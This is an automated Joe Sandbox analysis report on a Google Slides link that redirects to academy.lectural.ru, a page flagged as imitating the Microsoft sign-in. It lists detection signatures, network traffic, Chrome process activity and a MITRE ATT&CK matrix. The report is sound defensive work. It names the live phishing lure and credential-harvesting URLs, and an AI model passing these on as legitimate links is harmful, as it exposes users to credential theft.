Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
https://docs.google.com/presentation/d/e/2PACX-1vRFdNDen2Cuau5Sd4hRbUB9z7CUXInCHahSGLKpkrJHFJTTcyO1k9DiRmN4f7de2CeEYwMzbLc6Mqd5/pub?start=false&loop=false&delayms=3000

Overview

General Information

Sample URL:	https://docs.google.com/presentation/d/e/2PACX-1vRFdNDen2Cuau5Sd4hRbUB9z7CUXInCHahSGLKpkrJHFJTTcyO1k9DiRmN4f7de2CeEYwMzbLc6Mqd5/pub?start=false&loop=false&delayms=3000
Analysis ID:	1379290

Detection

HTMLPhisher

Score:	52
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Yara detected HtmlPhish10

Phishing site detected (based on image similarity)

Creates files inside the system directory

Found iframes

HTML body contains low number of good links

HTML page contains hidden URLs or javascript code

HTML title does not match URL

Invalid T&C link found

Stores files to the Windows start menu directory

Uses insecure TLS / SSL version for HTTPS connection

Classification

×

Process Tree

System is w10x64_ra

chrome.exe (PID: 5316 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://docs.google.com/presentation/d/e/2PACX-1vRFdNDen2Cuau5Sd4hRbUB9z7CUXInCHahSGLKpkrJHFJTTcyO1k9DiRmN4f7de2CeEYwMzbLc6Mqd5/pub?start=false&loop=false&delayms=3000 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 6636 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2012 --field-trial-handle=1976,i,15526233912238513531,11889460520866353408,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

cleanup

Yara Signatures

HTML

Source	Rule	Description	Author	Strings
1.10.pages.csv	JoeSecurity_HtmlPhish_10	Yara detected HtmlPhish_10	Joe Security

Sigma Signatures

⊘No Sigma rule has matched

Snort Signatures

⊘No Snort rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

Phishing

Yara detected HtmlPhish10

Source: Yara match

File source: 1.10.pages.csv, type: HTML

Phishing site detected (based on image similarity)

Source: https://academy.lectural.ru/3t6837t/

Matcher: Found strong image similarity, brand: MICROSOFT

Source: https://academy.lectural.ru/3t6837t/

HTTP Parser: Iframe src: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/t6d4c/0x4AAAAAAAP_i6gQuctZA-D5/auto/normal

Source: https://academy.lectural.ru/3t6837t/

HTTP Parser: Number of links: 0

Source: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/t6d4c/0x4AAAAAAAP_i6gQuctZA-D5/auto/normal

HTTP Parser: Base64 decoded: http://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/t6d4c/0x4AAAAAAAP_i6gQuctZA-D5/auto/normal

Source: https://academy.lectural.ru/3t6837t/

HTTP Parser: Title: Sign in to your Microsoft account does not match URL

Source: https://academy.lectural.ru/3t6837t/	HTTP Parser: Invalid link: Terms of use
Source: https://academy.lectural.ru/3t6837t/	HTTP Parser: Invalid link: Privacy & cookies

Source: https://academy.lectural.ru/3t6837t/

HTTP Parser: <input type="password" .../> found

Source: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/t6d4c/0x4AAAAAAAP_i6gQuctZA-D5/auto/normal	HTTP Parser: No favicon
Source: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/t6d4c/0x4AAAAAAAP_i6gQuctZA-D5/auto/normal	HTTP Parser: No favicon
Source: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/t6d4c/0x4AAAAAAAP_i6gQuctZA-D5/auto/normal	HTTP Parser: No favicon
Source: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/t6d4c/0x4AAAAAAAP_i6gQuctZA-D5/auto/normal	HTTP Parser: No favicon
Source: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/t6d4c/0x4AAAAAAAP_i6gQuctZA-D5/auto/normal	HTTP Parser: No favicon

Source: https://academy.lectural.ru/3t6837t/

HTTP Parser: No <meta name="author".. found

Source: https://academy.lectural.ru/3t6837t/

HTTP Parser: No <meta name="copyright".. found

Source: unknown

HTTPS traffic detected: 23.1.237.25:443 -> 192.168.2.16:49787 version: TLS 1.0

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

Directory created: C:\Program Files\Google\Chrome\Application\Dictionaries

Source: unknown	HTTPS traffic detected: 13.85.23.86:443 -> 192.168.2.16:49782 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.114.59.183:443 -> 192.168.2.16:49839 version: TLS 1.2

Source: unknown

HTTPS traffic detected: 23.1.237.25:443 -> 192.168.2.16:49787 version: TLS 1.0

Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.25
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.25
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.25
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.25
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknown	TCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknown	TCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknown	TCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknown	TCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknown	TCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknown	TCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknown	TCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknown	TCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknown	TCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknown	TCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknown	TCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknown	TCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknown	TCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknown	TCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknown	TCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.25
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.25
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.25
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.25
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.25
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.25
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.25
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.25
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.25
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.25
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.25
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.25
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.25
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.25
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.25
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.25
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: unknown

DNS traffic detected: queries for: docs.google.com

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49865
Source: unknown	Network traffic detected: HTTP traffic on port 49817 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49864
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49863
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49860
Source: unknown	Network traffic detected: HTTP traffic on port 49789 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49800 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49766 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49852 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49795 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49859
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49858
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49857
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49856
Source: unknown	Network traffic detected: HTTP traffic on port 49772 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49855
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 49841 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49854
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49853
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49852
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49851
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49850
Source: unknown	Network traffic detected: HTTP traffic on port 49812 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49858 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49784 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49806 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49823 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49777 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49849
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49727
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49848
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49726
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49847
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49846
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49724
Source: unknown	Network traffic detected: HTTP traffic on port 49790 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49723
Source: unknown	Network traffic detected: HTTP traffic on port 49674 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49843
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49841
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49840
Source: unknown	Network traffic detected: HTTP traffic on port 49834 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49760 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49828 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49805 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49839
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49838
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49837
Source: unknown	Network traffic detected: HTTP traffic on port 49847 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49836
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49835
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49834
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49833
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49832
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49831
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49830
Source: unknown	Network traffic detected: HTTP traffic on port 49839 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49864 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49822 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49726 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49765 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49853 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49796 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49829
Source: unknown	Network traffic detected: HTTP traffic on port 49811 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49828
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49827
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49826
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49704
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49825
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49824
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49823
Source: unknown	Network traffic detected: HTTP traffic on port 49771 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49822
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49788
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49787
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49786
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49784
Source: unknown	Network traffic detected: HTTP traffic on port 49813 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49783
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49782
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49781
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49780
Source: unknown	Network traffic detected: HTTP traffic on port 49836 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49807 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49776 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49791 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49868 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49759 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49779
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49778
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49777
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49776
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49775
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49774
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49773
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49772
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49771
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49770
Source: unknown	Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49780 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49851 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49830 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 49718 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49768
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49767
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49766
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49765
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49764
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49763
Source: unknown	Network traffic detected: HTTP traffic on port 49863 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49760
Source: unknown	Network traffic detected: HTTP traffic on port 49840 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49857 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49764 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49770 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49797 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49824 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49759
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown	Network traffic detected: HTTP traffic on port 49818 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49835 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49786 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49829 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49775 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49846 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 49792 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49868
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49867
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49866
Source: unknown	Network traffic detected: HTTP traffic on port 49672 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49781 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49769 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49803 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49826 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49849 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49866 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49837 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49763 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49855 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49798 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49819 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49787 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49793 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49850 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49831 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49774 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49799
Source: unknown	Network traffic detected: HTTP traffic on port 49782 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49798
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49797
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49796
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49795
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49794
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49793
Source: unknown	Network traffic detected: HTTP traffic on port 49814 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49792
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49791
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49790
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49856 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49768 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49825 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49808 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49867 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49789
Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49821
Source: unknown	Network traffic detected: HTTP traffic on port 49865 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49779 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49727 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49859 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49762 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49833 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49819
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49818
Source: unknown	Network traffic detected: HTTP traffic on port 49799 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49810 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49817
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49816
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49815
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49814
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49813
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49812
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49811
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49810
Source: unknown	Network traffic detected: HTTP traffic on port 49816 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49788 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49767 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49794 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49827 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49809
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49808
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49807
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49806
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49805
Source: unknown	Network traffic detected: HTTP traffic on port 49848 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49804
Source: unknown	Network traffic detected: HTTP traffic on port 49773 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49803
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49800
Source: unknown	Network traffic detected: HTTP traffic on port 49783 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49838 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49821 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49815 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49854 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49809 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49860 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49778 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49673 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49843 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49804 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49832 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49716 -> 443

Source: unknown	HTTPS traffic detected: 13.85.23.86:443 -> 192.168.2.16:49782 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.114.59.183:443 -> 192.168.2.16:49839 version: TLS 1.2

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

File created: C:\Windows\SystemTemp\chrome_BITS_5316_2039673177

Source: classification engine

Classification label: mal52.phis.win@18/133@40/281

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

File created: C:\Program Files\Google\Chrome\Application\Dictionaries

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps

Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://docs.google.com/presentation/d/e/2PACX-1vRFdNDen2Cuau5Sd4hRbUB9z7CUXInCHahSGLKpkrJHFJTTcyO1k9DiRmN4f7de2CeEYwMzbLc6Mqd5/pub?start=false&loop=false&delayms=3000
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2012 --field-trial-handle=1976,i,15526233912238513531,11889460520866353408,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2012 --field-trial-handle=1976,i,15526233912238513531,11889460520866353408,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

Directory created: C:\Program Files\Google\Chrome\Application\Dictionaries

Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact	Resource Development	Reconnaissance
1 Drive-by Compromise	Windows Management Instrumentation	1 Registry Run Keys / Startup Folder	1 Process Injection	13 Masquerading	OS Credential Dumping	System Service Discovery	Remote Services	Data from Local System	Exfiltration Over Other Network Medium	2 Encrypted Channel	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Abuse Accessibility Features	Acquire Infrastructure	Gather Victim Identity Information
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 Registry Run Keys / Startup Folder	1 Process Injection	LSASS Memory	Application Window Discovery	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	1 Non-Application Layer Protocol	SIM Card Swap	Obtain Device Cloud Backups	Network Denial of Service	Domains	Credentials
